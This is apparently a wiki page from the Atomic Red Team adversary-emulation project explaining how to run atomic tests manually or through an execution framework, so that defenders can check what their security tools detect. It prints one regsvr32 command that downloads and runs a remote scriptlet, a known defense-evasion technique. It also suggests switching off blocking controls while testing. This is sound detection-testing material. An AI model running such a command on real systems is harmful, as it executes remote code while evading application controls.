Skip to content

_Executing Atomic Tests

Jump to bottom
Adam Mashinchi edited this page Jul 14, 2021 · 1 revision

[THIS CONTENT MAY BE OUT OF DATE - PLEASE SEE "GETTING STARTED"]

Things to Consider Before Executing an Atomic Test

  • Make sure that you have permission from system owners to test.
  • To get familiar with Atomic Red Team, consider using a Virtual Machine. Microsoft has easy to download and use Virtual Machines here. If you want a test lab with an Active Directory domain, multiple systems and central logging in place consider using Detection Lab or the Splunk Attack Range.
  • When you are ready, set up a test machine that would be similar to the build in your environment. Be sure you have your collection/EDR solution in place, and that the endpoint is checking in and active.
  • Consider disabling blocking controls as part of your testing. "Prevention is ideal, but detection is a must!"

Execute an Atomic Test Manually

We could browse through the list of available atomic tests and pick one to execute like the one below.

image

This test is pretty straight forward, we see that there is just one attack command that we should execute from the command prompt to emulate this attack. We can simply copy and paste the command (after substituting in the #{filename} input argument as follows:

regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll

After execution, what does your security solution observe?

  • You may see a file modification in the user’s profile.
  • You may detect network connections made by regsvr32.exe to an external IP.
  • There may be an entry in the proxy logs.
  • You may observe the scrobj.dll loading on Windows.
  • Or you might not observe any behavior on the endpoint or network.

This is why we test! We want to identify visibility gaps and determine where we need to make improvements.

Execute an Atomic Test with an Execution Framework

There are a variety of Execution Frameworks that automate the execution of the atomic tests defined in this repository. The most actively maintained and feature rich execution framework is the PowerShell Invoke-AtomicRedTeam framework. It works cross-platform for executing atomic tests locally or on remote machines. There are also Python and GoLang versions developed by the community.

Questions? Get connected to the community on the Atomic Red Team™ Slack channel.

Clone this wiki locally